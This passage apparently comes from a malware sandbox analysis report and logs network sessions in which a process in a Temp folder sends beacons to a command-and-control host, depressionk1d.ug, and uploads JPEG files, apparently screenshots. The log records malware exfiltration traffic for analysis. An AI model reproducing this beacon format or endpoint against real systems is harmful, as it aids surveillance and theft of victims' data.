                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TCWw7hAnZYimwBLtsIuk63fA0HNFeo5J43V1WZa3qcyhb6wRocov%2Fr2P9AKAAND%2FurBD4QDleo0mtgTsfcb25XiotIsOwkrCQQOD1RojkWdk%2BMebl8daKVUc6Am9N%2B0u2kUPuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 6ad2d21958f35364-FRA
                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          180192.168.2.449965178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.874058962 CET8358OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:55.900284052 CET8358INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          181192.168.2.449967178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:56.120996952 CET8359OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:56.148557901 CET8398INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          182192.168.2.449966178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:56.122304916 CET8360OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----681dc45aa8e7e3e73e55f3d3bf467b87
                          Host: depressionk1d.ug
                          Content-Length: 106842
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:56.122387886 CET8360OUTData Raw: 2d 2d 2d 2d 2d 2d 36 38 31 64 63 34 35 61 61 38 65 37 65 33 65 37 33 65 35 35 66 33 64 33 62 66 34 36 37 62 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------681dc45aa8e7e3e73e55f3d3bf467b87Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:56.122561932 CET8370OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:56.122642994 CET8372OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:56.146981955 CET8378OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:56.147020102 CET8381OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:56.147229910 CET8384OUTData Raw: 14 53 c8 a4 c5 2b 0e e3 28 a7 e2 9a 45 21 89 4b da 8c 50 28 01 08 a4 c5 3f 14 98 a4 3b 8c 22 93 14 fa 42 29 58 77 1b 8a 31 4e c5 18 a2 c1 71 98 a5 c5 2e 29 3b d2 18 98 a3 14 ee d4 94 00 98 a5 c5 2e 29 28 01 0d 30 9c d3 89 cd 36 93 1a 19 5b 3e 19
                          Data Ascii: S+(E!KP(?;"B)Xw1Nq.);.)(06[>1XI\O2GW[Y7[ NO5X[Y!f&Gsk,KqAGW*GOzxDF_CaUe|c3?]#-
                          Nov 12, 2021 22:23:56.147306919 CET8398OUTData Raw: d1 21 4b 49 4b 4c 42 1c d2 81 45 2d 30 0a 28 a5 c5 31 0a 28 a2 81 40 82 96 92 96 98 0b 4e 14 da 50 2a 89 1f 4a 0d 36 9c 29 92 3c 3e 29 c1 ea 2a 2a 93 26 c4 e0 83 46 d0 6a 30 69 c0 d5 5f b9 36 15 a0 06 a3 36 de 95 30 6a 76 ea 7c a9 87 34 91 4c c0
                          Data Ascii: !KIKLBE-0(1(@NP*J6)<>)**&Fj0i_660jv|4L0GIRWn*6=]6&UJ`aM*E.VL@)i1NZ\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI
                          Nov 12, 2021 22:23:56.170721054 CET8402OUTData Raw: fe e1 bf 9f e1 a1 5b 56 b3 86 c6 ee d6 18 1a 46 59 6c 2d ae 5b 79 04 86 92 35 72 06 00 e3 27 8a a7 5a 1a 86 a7 61 a8 db db 37 f6 6d e4 37 f0 da c1 6a 66 fb 62 b4 4c 22 40 99 f2 fc a0 41 20 7f 7f 8a cf ae ca 4e 4e 3e f7 76 72 55 51 4f dd ec 82 94
                          Data Ascii: [VFYl-[y5r'Za7m7jfbL"@A NN>vrUQORQZ*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<iVOf&hPj+AM2Z
                          Nov 12, 2021 22:23:56.170764923 CET8415OUTData Raw: 92 94 53 10 e0 29 c0 50 05 38 0a a4 88 6c 50 28 c5 38 0a 0d 5d 89 23 3d 29 b4 f3 4d 35 2c a4 36 8a 5a 4c 54 8c 28 a5 a4 14 00 e1 4b 48 28 14 c4 2d 14 52 53 01 7b d2 f7 a4 a5 a0 05 a2 8a 29 88 5a 28 a4 34 c0 53 45 14 50 02 8e 94 b4 d1 4e a6 48 52
                          Data Ascii: S)P8lP(8]#=)M5,6ZLT(KH(-RS{)Z(4SEPNHRRNS-(GRK@KM8QIKLBN2TcLj,p4L8X)U<x54$NPj(<A&H;9RTh~iAlH;5SL4\N2Z%3JI
                          Nov 12, 2021 22:23:56.170785904 CET8416OUTData Raw: e1 6c 69 ff 00 f4 0f b9 ff 00 be d6 a7 92 5d 8a 52 47 a2 83 8a f2 7f 8a 9f eb ac bf e0 7f d2 b5 3f e1 6c e9 e3 fe 61 f7 1f f7 d8 ae 33 c6 5e 28 b7 f1 23 db b5 bd b4 90 88 b7 67 7b 03 9c d5 d3 8b 8c b5 26 5a d8 f3 4a 0d 2e d3 49 b4 d7 15 99 ea 9e
                          Data Ascii: li]RG?la3^(#g{&ZJ.IG1^ c"|?~W>T-PJ5K7ot7nmGTWhJ[&3[Kh4)BR4R4;?2
                          Nov 12, 2021 22:23:56.218765020 CET8470INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:56.269233942 CET8470OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:56.294565916 CET8471INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          183192.168.2.449968178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:56.462101936 CET8471OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:56.487931013 CET8472INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          184192.168.2.449969178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:56.656429052 CET8472OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:56.682476044 CET8473INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          185192.168.2.449970178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:56.855655909 CET8473OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:56.881656885 CET8474INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          186192.168.2.449971178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.019174099 CET8475OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.050852060 CET8489INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          187192.168.2.449972178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.029473066 CET8475OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----7528d71526b232f5f62aa1709e48d5df
                          Host: depressionk1d.ug
                          Content-Length: 107845
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:57.029603958 CET8476OUTData Raw: 2d 2d 2d 2d 2d 2d 37 35 32 38 64 37 31 35 32 36 62 32 33 32 66 35 66 36 32 61 61 31 37 30 39 65 34 38 64 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------7528d71526b232f5f62aa1709e48d5dfContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:57.029854059 CET8486OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:57.029997110 CET8488OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:57.052356958 CET8492OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:57.052422047 CET8500OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:57.052440882 CET8503OUTData Raw: 11 5d fd 95 a6 63 20 c6 59 62 76 45 24 64 02 e0 6d 04 8e 80 9c 9c 8f 51 58 f7 1a 3d dc ba c5 c5 ad 9c df 65 b3 6d 36 2b 66 76 80 be 57 74 80 85 39 00 30 04 7a f5 e9 53 7f c2 2f 1c 5a cb df db fd 87 e7 28 d9 b8 b2 12 cb 19 55 0b f2 49 b8 15 e0 0e
                          Data Ascii: ]c YbvE$dmQX=em6+fvWt90zS/Z(UIZgWRs</'+uj#x,tcIH3DYUnAuSZzlLVsnZy7ebvvrxj&aKh9T2DA!QmO:ZkZ[O{=EL&bas*swsu]G]
                          Nov 12, 2021 22:23:57.052465916 CET8506OUTData Raw: 62 90 c4 a4 a7 62 8c 53 b0 8a 75 d8 78 46 c6 c7 51 f0 ee bb 6b 75 6f 0b 5c 5c 4d 6b 6d 69 3b a8 dd 14 ae 26 29 83 d4 06 75 45 3e c7 9e 95 c9 ec 15 2a cf 77 1d 94 f6 70 ce 52 de 79 23 96 45 00 64 b2 6e d8 73 d4 63 73 74 3d eb 9a a4 25 28 34 bf ad
                          Data Ascii: bbSuxFQkuo\\Mkmi;&)uE>*wpRy#Ednscst=%(4NI)][Zoo.`Ol\$e[6S\i\__bI-Bv2w],7q^#i$r;n<t1kfge[E#X;)dHcURHV_}+J
                          Nov 12, 2021 22:23:57.052524090 CET8508OUTData Raw: d1 4c 57 13 14 a0 52 e2 8c 50 01 8a 5c 51 8a 5c 53 10 94 a2 94 8a 00 a6 20 c5 00 51 4b 40 82 8a 28 a6 01 4e a4 14 b4 c4 c2 96 92 94 53 42 14 52 d2 0a 75 34 20 a2 8a 75 31 09 4b 45 2e 29 ea 21 29 c2 92 96 81 05 2d 25 2d 31 0a 05 28 a0 52 8a a2 43
                          Data Ascii: LWRP\Q\S QK@(NSBRu4 u1KE.)!)-%-1(RCbbSSv$ZJ;QKTHRZX)-R$p4U&KD:HS7jxj:PSg`I[={.P\k_J8lQ2QE&)X.&)qJ(V
                          Nov 12, 2021 22:23:57.052566051 CET8515OUTData Raw: 22 cb fe b8 27 fe 82 2b 59 40 fb 38 6e 87 19 af 98 a1 56 a5 59 38 b9 ca fe ac f6 65 4e 11 49 f2 af b8 f3 81 f0 83 c2 e3 ae 9b 31 fa 5c b9 fe b5 e2 fe 29 f0 b5 fe 8b ad ea 08 9a 55 f4 5a 7c 53 b8 86 59 21 7d a6 30 78 3b 88 c1 18 ef 5f 56 b9 1e 57
                          Data Ascii: "'+Y@8nVY8eNI1\)UZ|SY!}0x;_VW:W?Y/k9TC+)>:$4(+/D{H#/vS|+O$pc~(|#T+[H0i#W!hM]#C$x=i(7AN^X
                          Nov 12, 2021 22:23:57.075005054 CET8518OUTData Raw: 24 20 e4 f4 cf 5c d5 e8 3c 4f a7 45 7d a7 dc 37 87 e7 07 4a 97 cc d3 d6 2b fc 6c 1b fc cf 2e 42 d1 b6 f4 0e 58 8c 6d 60 09 05 8f 04 62 fd b2 95 ba 7f c0 ff 00 3f d7 c8 d7 f7 4d 69 bf f5 fd 7d dd 85 ba d1 61 b5 f0 65 8e ae 34 8d 6a 77 b8 8e 46 96
                          Data Ascii: $ \<OE}7J+l.BXm`b?Mi}ae4jwF{vY0<p\rjht4|En&}b}+&Ut;;[2\Cx+IOJ=#mtk~$$%#=1G5m_F=gBlnm?JRXpB
                          Nov 12, 2021 22:23:57.123727083 CET8587INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:57.161223888 CET8588OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.186871052 CET8588INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          188192.168.2.449974178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.408648968 CET8593OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.434689999 CET8593INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          189192.168.2.449975178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.653404951 CET8594OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.680387974 CET8633INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          19192.168.2.449801178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:19.042795897 CET2419OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----fe5fd9d972afa9463906ab265b5c60cb
                          Host: depressionk1d.ug
                          Content-Length: 117120
